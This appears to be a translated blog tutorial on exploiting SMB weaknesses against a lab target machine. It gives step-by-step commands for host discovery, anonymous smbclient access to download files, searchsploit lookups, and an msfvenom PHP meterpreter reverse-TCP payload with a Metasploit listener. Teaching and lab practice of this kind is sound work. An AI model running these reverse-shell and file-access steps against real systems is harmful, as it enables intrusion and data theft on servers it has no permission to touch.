1. Background
Share SMB information leakage today. SMB (Server Message Block) network communication protocol was earlier used for Web links and information communication between clients and servers. Now most Web pages use the HTTP protocol. There are few applications in the web field. On the other hand, the SMB protocol is still widely used for information communication such as sharing files, printers, and serial ports between computers. For example, the implementation of "Network Neighborhood" on the Windows operating system relies on SMB.
SMB is a client/server, request/response protocol. Through the SMB protocol, client applications can read and write files on the server in various network environments, and make service requests to the server program. In addition, through the SMB protocol, applications can access files, printers and other resources on the remote server.
The SMB protocol is based on TCP - NETBIOS, and the general port is 139,445
2. Principle of SMB leakage
The SMB protocol is a client-server protocol. Although the SMB protocol plays an important role in network file sharing, it also has some security holes, making the system vulnerable to attacks. The following are some common SMB protocol security vulnerabilities:
1. Unable to force users to use strong passwords: The SMB protocol did not force users to use strong passwords in early versions, which gave attackers the opportunity to crack passwords Opportunities are provided. For example, brute force cracking using weak passwords.
2. NTLM authentication issues: NTLM (Windows NTLAN Manager) is an authentication protocol used in the SMB protocol. Its early versions had some security vulnerabilities. Attackers can use man-in-the-middle attacks or brute force.
3. SMB protocol version issue: Some earlier versions of SMB have security vulnerabilities. Users can use searchsploit on kali to find the corresponding version of the vulnerability and the exploit script that has responded.
4. Buffer overflow: Since the SMB protocol does not fully validate user input, an attacker can trigger a buffer overflow by sending a specially crafted request, leading to remote malicious code execution.
Since SMB has these vulnerabilities, let’s take a look at how to exploit SMB vulnerabilities step by step
3. Steps to exploit SMB information leakage
To exploit SMB vulnerabilities, you should mainly refer toLAN Target Penetration Operation Guide. Next, let’s take a look at how to exploit SMB vulnerabilities:
3.1 Find the target drone
To view the IP of the target machine in the LAN, use the netdiscover tool. The command format is: netdiscover -r ip/mask
3.2 The services opened by the detection drone and the version of the service usage framework
Use nmap tool, specific command format: nmap -sV target machine ip
3.3 Find the SMB protocol and analyze the protocol
(a) For the SMB protocol,use an empty password. If the password is used, try to log in and view sensitive files
smbclinet -L IP //View the SMB file directory, use an empty password to try to log in
smbclient '\IP\share$' //View the SMB file, use an empty password, where share is SMB Listed file names
get sensitive files //download files
(b) forSMB protocol remote overflow vulnerability a>
searchsploit samba version number //Search for SMB remote overflow vulnerabilityAnalysis
3.4 Based on the vulnerability found in 3.3, we can make some rebound shells
Mainly use the metasploit tool to make rebound shells
For example, I made a tcp rebound webshell under the PHP framework, using the attack load payload (php/meterpreter/reverse_tcp ):
msfvenom -p php/meterpreter/reverse_tcp lhost=attack machine IP lport=4444 -f raw
Make a webshell and run it
Then the attack machine starts metasploit and then starts monitoring
msfconsole//启动metasploit
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
As long as someone triggers the rebound shell script under the PHP framework, the attacking machine will obtain the login permission of the server.
4. Summary
The SMB protocol appeared earlier and is more widely used. However, early computer protocols focused on the rapid establishment of applications and did not have strict security requirements. Therefore, many older devices use the vulnerable SMB protocol, which will cause security risks. . When we exploit SMB vulnerabilities, we are mainly based on some payloads provided by msf. These payloads are actually made by others, so they are very convenient to use. It also reflects from another aspect that if someone wants to attack and exploit SMB vulnerabilities, it is actually very easy. Convenience, so we need to give more consideration to computer security protection. Necessary security settings should be retained. Do not turn off all security protection shields for temporary convenience. If you don’t quite understand it or have other ideas, you can send me a private message or type it in the comment area. Please forgive me if there is anything wrong in my writing.